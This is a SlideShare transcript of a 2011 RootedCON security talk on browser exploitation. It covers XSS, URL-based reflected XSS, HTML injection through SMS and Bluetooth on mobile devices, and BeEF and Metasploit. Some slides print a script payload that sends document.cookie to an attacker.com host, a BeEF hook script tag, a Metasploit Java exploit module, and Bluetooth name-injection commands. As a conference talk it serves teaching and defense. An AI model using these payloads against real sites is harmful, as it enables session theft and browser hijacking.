SlideShare a Scribd company logo

Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2011]

RootedCON
RootedCON

This document summarizes an upcoming presentation on browser exploitation techniques. It will discuss previous episodes on the topic, the state of cross-site scripting (XSS) vulnerabilities, a new type of non-persistent global or URL-based XSS, exploiting mobile devices through multiple technologies like SMS and Bluetooth, and demonstrating exploitation using tools like BeEF and Metasploit. The presentation aims to show how easily a browser can be attacked and to change perceptions of XSS vulnerabilities.

Related slideshows

How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ Disobey
 
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
Francisco Jesús Gómez + Carlos Juan Diaz - Cloud Malware Distribution: DNS wi...
 
Automated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security IntelligenceAutomated Malware Analysis and Cyber Security Intelligence
Automated Malware Analysis and Cyber Security Intelligence
 
1 of 29
Download to read offline
www.taddong.com Browser Exploitation for Fun and Profit Revolutions (…in less than 24 hours ) Raúl Siles raul@taddong.com March 4, 2011 Copyright © 2011 Taddong S.L. All rights reserved.
Outline •  On previous episodes… (3rd on the series) •  XSS state-of-the-art (≈ WCI) •  “New” kind of XSS: –  Global (or URL-based) non-persistent XSS •  Multi-technology WCI on mobile devices •  Browser exploitation through XSS –  BeEF + Metasploit + attacker’s imagination •  References Copyright © 2011 Taddong S.L. www.taddong.com 2
On Previous Episodes… •  “Browser Exploitation for Fun & Profit” –  Target: Web browser (& its plug-ins) –  Web application pen-tester setup & Demos –  Samurai WTF & BeEF & Metasploit http://blog.taddong.com/2010/11/browser-exploitation-for-fun-profit.html •  “Browser Exploitation for Fun & Profit Reloaded” –  Top vuln applications 2010: Java & Adobe –  Updating to the Ruby-based BeEF version –  Web browsing best practices http://blog.taddong.com/2010/12/browser-exploitation-for-fun-profit.html Copyright © 2011 Taddong S.L. www.taddong.com 3
XSS State-of-the-Art Copyright © 2011 Taddong S.L. www.taddong.com 4
Can My Browser Be Attacked? •  You only need to visit a single malicious web page… and be vulnerable to a single flaw… on your web browser or any of the installed plug-ins or add-ons… and … Trusted websites attacking you •  Drive-by-XSS Lots of attack vectors… such as XSS Copyright © 2011 Taddong S.L. www.taddong.com 5
Cross-Site Scripting (XSS) •  XSS (JavaScript) –  Why not “web content injection” (WCI)? –  Others: HTML, images, Java, Flash, ActiveX… •  XSS types –  Non-persistent & Persistent & … •  Risk/Impact perception: Low –  Industry & pen-tests Copyright © 2011 Taddong S.L. www.taddong.com 6
Who is (not) vulnerable to XSS? xssed.com Copyright © 2011 Taddong S.L. www.taddong.com 7
“New” kind of XSS: Global (or URL-based) Non-Persistent XSS Copyright © 2011 Taddong S.L. www.taddong.com 8
Traditional XSS Protections •  Enforce input validation and output encoding –  GET & POST parameters –  HTTP headers GET /portal?lang=es&q=rootedcon&year=2011 HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 Accept: text/html,application/xhtml+xml,application/ xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Referer: http://www.example.com/main ... Copyright © 2011 Taddong S.L. www.taddong.com 9
Target Web Application •  Initially discovered during a real web application pen-test in Spain •  Multi-language support web-app –  Top HTML header includes links to the other languages (on every web page): URL https://www.example.com/portal/ […params] <UL class=cabecera_idiomas> <LI><a href="https://www.example.com/portal/?lang=es"> Bienvenidos</a></LI> <LI><a href="https://www.example.com/portal/?lang=en"> Welcome</a></LI> ...</UL> Copyright © 2011 Taddong S.L. www.taddong.com 10
Global (or URL-based) non- persistent XSS (1) •  HTML or script injection after the “?” without parameters https://www.example.com/portal/?"><script> document.location='https://www.attacker.com/triqui.php? c='+document.cookie</script> •  The script is reflected N-times on the web page received as the response –  One per language (by default) •  Similar scenario before the “?” (URL) or between parameters Copyright © 2011 Taddong S.L. www.taddong.com 11
Global (or URL-based) non- persistent XSS (2) •  Global: All web application resources (URLs) are vulnerable to XSS –  Not a specific HTTP parameter –  Better for: •  Obfuscation (long URLs) •  Social engineering •  More damaging attacks (e.g. web login page) •  Defenses: input validation and output encoding on everything (including the URL) Copyright © 2011 Taddong S.L. www.taddong.com 12
Multi-technology WCI (≈XSS) on Mobile Devices Copyright © 2011 Taddong S.L. www.taddong.com 13
XSS Everywhere •  XSS: the input is reflected on the output –  Immediately or “somewhere in time” •  Any input is a potential vulnerable candidate, as well as any output •  Web content injection (≈XSS) through multiple technologies on mobile devices –  SMS and Bluetooth What about… Wi-Fi, 2G/3G, etc? (network name) Copyright © 2011 Taddong S.L. www.taddong.com 14
SMS •  Initially discovered on Palm WebOS –  Open web sites, download files, install new root CA certs, turn off radio, or wipe device •  Extended to Windows Mobile & HTC –  Web-based SMS preview capabilities on HTC Windows Mobile smart-phones (scripting) •  http://www.securityfocus.com/archive/1/510897/30/ •  Defenses: Disable preview or update http://intrepidusgroup.com/insight/webos/ Copyright © 2011 Taddong S.L. www.taddong.com 15
SMS on Windows Mobile 6.5 From: 666123666 To: 6001234567 Mensaje (SMS): <script>alert ('Ejecucion de Javascript')</ script> Copyright © 2011 Taddong S.L. www.taddong.com 16
Bluetooth •  Discovered on Windows Mobile 6.1 –  Native web-based GUI notification subsystem •  Bluetooth pairing and profile access –  Bluetooth authorization message (<=32 chars) –  Only HTML (no scripting): Blueline attacks •  Defenses: Customized notification subsystem (vendor based) http://www.hackingexposedwireless.com Copyright © 2011 Taddong S.L. www.taddong.com 17
Bluetooth on Windows Mobile 6.1 # hciconfig hci0 name "<b>Ordenador</b> no peligro<i>so</i>" # hciconfig hci0 name "Mantener Bluetooth activo?<br><p" Copyright © 2011 Taddong S.L. www.taddong.com 18
Root Cause of the Problem •  Web contents everywhere (or converted to) •  Information displayed (GUI) via a web- based engine (HTML, JavaScript & more) Databases Web-App Copyright © 2011 Taddong S.L. www.taddong.com 19
Near Future Vulnerable Inputs •  Camera: Barcode or QR code reader, etc •  Microphone: HTML-based audio transcript Copyright © 2011 Taddong S.L. www.taddong.com 20
Browser Exploitation through XSS Copyright © 2011 Taddong S.L. www.taddong.com 21
Demonstrating XSS •  Most common example:  –  Quick for XSS discovery but… <script>alert(‘XSS’)</script> How to contribute to change this general perception? Copyright © 2011 Taddong S.L. www.taddong.com 22
Live Demo Copyright © 2011 Taddong S.L. www.taddong.com 23
Exploiting Java CVE-2010-0886 •  All vulnerability details are on previous episodes –  Java 6 Update (10 =< x <= 19) •  “Do you know Rubén Santamarta?”  •  Exploit requirements: –  Metasploit running as root (sudo) –  SMB not running on pen-tester system –  WebClient (WebDAV Mini-Redirector) running on target (by default) –  WEBDAV requires SRVPORT=80 and URIPATH=/ (BeEF is running there!! Use != IP addresses) exploit/windows/browser/java_ws_arginject_altjvm Copyright © 2011 Taddong S.L. www.taddong.com 24
BeEF Exploitation •  This is the only script the attacker needs to inject in the target web application: (PHP) <script src="http://www.attacker.com/ beef/hook/beefmagic.js"></script> •  Metasploit integration •  Persistent hooking (100% iframe) –  URL limitation (& favicon) – Yori Kvitchko –  Not in some mobile devices… Copyright © 2011 Taddong S.L. www.taddong.com 25
Persistent Hooking in Mobile Devices through URL hiding •  URL hiding or addr. bar replacement •  UI spoofing Safari on the iPhone –  JavaScript pushes real address bar up •  Android too http://evil-lemur.com/mobile/ http://software-security.sans.org/blog/2010/11/29/ui- spoofing-safari-iphone Copyright © 2011 Taddong S.L. www.taddong.com 26
References •  Presentations in the Browser Exploitation for Fun & Profit Series: http://blog.taddong.com •  Samurai WTF (Web Testing Framework): –  http://sourceforge.net/projects/samurai/ •  BeEF –  http://www.bindshell.net/tools/beef/ –  https://code.google.com/p/beef/ •  MetaSploit Framework (MSF): (autopwn) –  http://www.metasploit.com –  http://www.metasploit.com/framework/modules/ Copyright © 2011 Taddong S.L. www.taddong.com 27
Questions?  Copyright © 2011 Taddong S.L. www.taddong.com 28
www.taddong.com Blog: blog.taddong.com Twitter: @taddong raul@taddong.com

More Related Content

Raúl Siles - Browser Exploitation for Fun and Profit Revolutions [RootedCON 2011]

  • 1. www.taddong.com Browser Exploitation for Fun and Profit Revolutions (…in less than 24 hours ) Raúl Siles raul@taddong.com March 4, 2011 Copyright © 2011 Taddong S.L. All rights reserved.
  • 2. Outline •  On previous episodes… (3rd on the series) •  XSS state-of-the-art (≈ WCI) •  “New” kind of XSS: –  Global (or URL-based) non-persistent XSS •  Multi-technology WCI on mobile devices •  Browser exploitation through XSS –  BeEF + Metasploit + attacker’s imagination •  References Copyright © 2011 Taddong S.L. www.taddong.com 2
  • 3. On Previous Episodes… •  “Browser Exploitation for Fun & Profit” –  Target: Web browser (& its plug-ins) –  Web application pen-tester setup & Demos –  Samurai WTF & BeEF & Metasploit http://blog.taddong.com/2010/11/browser-exploitation-for-fun-profit.html •  “Browser Exploitation for Fun & Profit Reloaded” –  Top vuln applications 2010: Java & Adobe –  Updating to the Ruby-based BeEF version –  Web browsing best practices http://blog.taddong.com/2010/12/browser-exploitation-for-fun-profit.html Copyright © 2011 Taddong S.L. www.taddong.com 3
  • 4. XSS State-of-the-Art Copyright © 2011 Taddong S.L. www.taddong.com 4
  • 5. Can My Browser Be Attacked? •  You only need to visit a single malicious web page… and be vulnerable to a single flaw… on your web browser or any of the installed plug-ins or add-ons… and … Trusted websites attacking you •  Drive-by-XSS Lots of attack vectors… such as XSS Copyright © 2011 Taddong S.L. www.taddong.com 5
  • 6. Cross-Site Scripting (XSS) •  XSS (JavaScript) –  Why not “web content injection” (WCI)? –  Others: HTML, images, Java, Flash, ActiveX… •  XSS types –  Non-persistent & Persistent & … •  Risk/Impact perception: Low –  Industry & pen-tests Copyright © 2011 Taddong S.L. www.taddong.com 6
  • 7. Who is (not) vulnerable to XSS? xssed.com Copyright © 2011 Taddong S.L. www.taddong.com 7
  • 8. “New” kind of XSS: Global (or URL-based) Non-Persistent XSS Copyright © 2011 Taddong S.L. www.taddong.com 8
  • 9. Traditional XSS Protections •  Enforce input validation and output encoding –  GET & POST parameters –  HTTP headers GET /portal?lang=es&q=rootedcon&year=2011 HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.14) Gecko/20110218 Firefox/3.6.14 Accept: text/html,application/xhtml+xml,application/ xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Referer: http://www.example.com/main ... Copyright © 2011 Taddong S.L. www.taddong.com 9
  • 10. Target Web Application •  Initially discovered during a real web application pen-test in Spain •  Multi-language support web-app –  Top HTML header includes links to the other languages (on every web page): URL https://www.example.com/portal/ […params] <UL class=cabecera_idiomas> <LI><a href="https://www.example.com/portal/?lang=es"> Bienvenidos</a></LI> <LI><a href="https://www.example.com/portal/?lang=en"> Welcome</a></LI> ...</UL> Copyright © 2011 Taddong S.L. www.taddong.com 10
  • 11. Global (or URL-based) non- persistent XSS (1) •  HTML or script injection after the “?” without parameters https://www.example.com/portal/?"><script> document.location='https://www.attacker.com/triqui.php? c='+document.cookie</script> •  The script is reflected N-times on the web page received as the response –  One per language (by default) •  Similar scenario before the “?” (URL) or between parameters Copyright © 2011 Taddong S.L. www.taddong.com 11
  • 12. Global (or URL-based) non- persistent XSS (2) •  Global: All web application resources (URLs) are vulnerable to XSS –  Not a specific HTTP parameter –  Better for: •  Obfuscation (long URLs) •  Social engineering •  More damaging attacks (e.g. web login page) •  Defenses: input validation and output encoding on everything (including the URL) Copyright © 2011 Taddong S.L. www.taddong.com 12
  • 13. Multi-technology WCI (≈XSS) on Mobile Devices Copyright © 2011 Taddong S.L. www.taddong.com 13
  • 14. XSS Everywhere •  XSS: the input is reflected on the output –  Immediately or “somewhere in time” •  Any input is a potential vulnerable candidate, as well as any output •  Web content injection (≈XSS) through multiple technologies on mobile devices –  SMS and Bluetooth What about… Wi-Fi, 2G/3G, etc? (network name) Copyright © 2011 Taddong S.L. www.taddong.com 14
  • 15. SMS •  Initially discovered on Palm WebOS –  Open web sites, download files, install new root CA certs, turn off radio, or wipe device •  Extended to Windows Mobile & HTC –  Web-based SMS preview capabilities on HTC Windows Mobile smart-phones (scripting) •  http://www.securityfocus.com/archive/1/510897/30/ •  Defenses: Disable preview or update http://intrepidusgroup.com/insight/webos/ Copyright © 2011 Taddong S.L. www.taddong.com 15
  • 16. SMS on Windows Mobile 6.5 From: 666123666 To: 6001234567 Mensaje (SMS): <script>alert ('Ejecucion de Javascript')</ script> Copyright © 2011 Taddong S.L. www.taddong.com 16
  • 17. Bluetooth •  Discovered on Windows Mobile 6.1 –  Native web-based GUI notification subsystem •  Bluetooth pairing and profile access –  Bluetooth authorization message (<=32 chars) –  Only HTML (no scripting): Blueline attacks •  Defenses: Customized notification subsystem (vendor based) http://www.hackingexposedwireless.com Copyright © 2011 Taddong S.L. www.taddong.com 17
  • 18. Bluetooth on Windows Mobile 6.1 # hciconfig hci0 name "<b>Ordenador</b> no peligro<i>so</i>" # hciconfig hci0 name "Mantener Bluetooth activo?<br><p" Copyright © 2011 Taddong S.L. www.taddong.com 18
  • 19. Root Cause of the Problem •  Web contents everywhere (or converted to) •  Information displayed (GUI) via a web- based engine (HTML, JavaScript & more) Databases Web-App Copyright © 2011 Taddong S.L. www.taddong.com 19
  • 20. Near Future Vulnerable Inputs •  Camera: Barcode or QR code reader, etc •  Microphone: HTML-based audio transcript Copyright © 2011 Taddong S.L. www.taddong.com 20
  • 21. Browser Exploitation through XSS Copyright © 2011 Taddong S.L. www.taddong.com 21
  • 22. Demonstrating XSS •  Most common example:  –  Quick for XSS discovery but… <script>alert(‘XSS’)</script> How to contribute to change this general perception? Copyright © 2011 Taddong S.L. www.taddong.com 22
  • 23. Live Demo Copyright © 2011 Taddong S.L. www.taddong.com 23
  • 24. Exploiting Java CVE-2010-0886 •  All vulnerability details are on previous episodes –  Java 6 Update (10 =< x <= 19) •  “Do you know Rubén Santamarta?”  •  Exploit requirements: –  Metasploit running as root (sudo) –  SMB not running on pen-tester system –  WebClient (WebDAV Mini-Redirector) running on target (by default) –  WEBDAV requires SRVPORT=80 and URIPATH=/ (BeEF is running there!! Use != IP addresses) exploit/windows/browser/java_ws_arginject_altjvm Copyright © 2011 Taddong S.L. www.taddong.com 24
  • 25. BeEF Exploitation •  This is the only script the attacker needs to inject in the target web application: (PHP) <script src="http://www.attacker.com/ beef/hook/beefmagic.js"></script> •  Metasploit integration •  Persistent hooking (100% iframe) –  URL limitation (& favicon) – Yori Kvitchko –  Not in some mobile devices… Copyright © 2011 Taddong S.L. www.taddong.com 25
  • 26. Persistent Hooking in Mobile Devices through URL hiding •  URL hiding or addr. bar replacement •  UI spoofing Safari on the iPhone –  JavaScript pushes real address bar up •  Android too http://evil-lemur.com/mobile/ http://software-security.sans.org/blog/2010/11/29/ui- spoofing-safari-iphone Copyright © 2011 Taddong S.L. www.taddong.com 26
  • 27. References •  Presentations in the Browser Exploitation for Fun & Profit Series: http://blog.taddong.com •  Samurai WTF (Web Testing Framework): –  http://sourceforge.net/projects/samurai/ •  BeEF –  http://www.bindshell.net/tools/beef/ –  https://code.google.com/p/beef/ •  MetaSploit Framework (MSF): (autopwn) –  http://www.metasploit.com –  http://www.metasploit.com/framework/modules/ Copyright © 2011 Taddong S.L. www.taddong.com 27
  • 28. Questions?  Copyright © 2011 Taddong S.L. www.taddong.com 28
  • 29. www.taddong.com Blog: blog.taddong.com Twitter: @taddong raul@taddong.com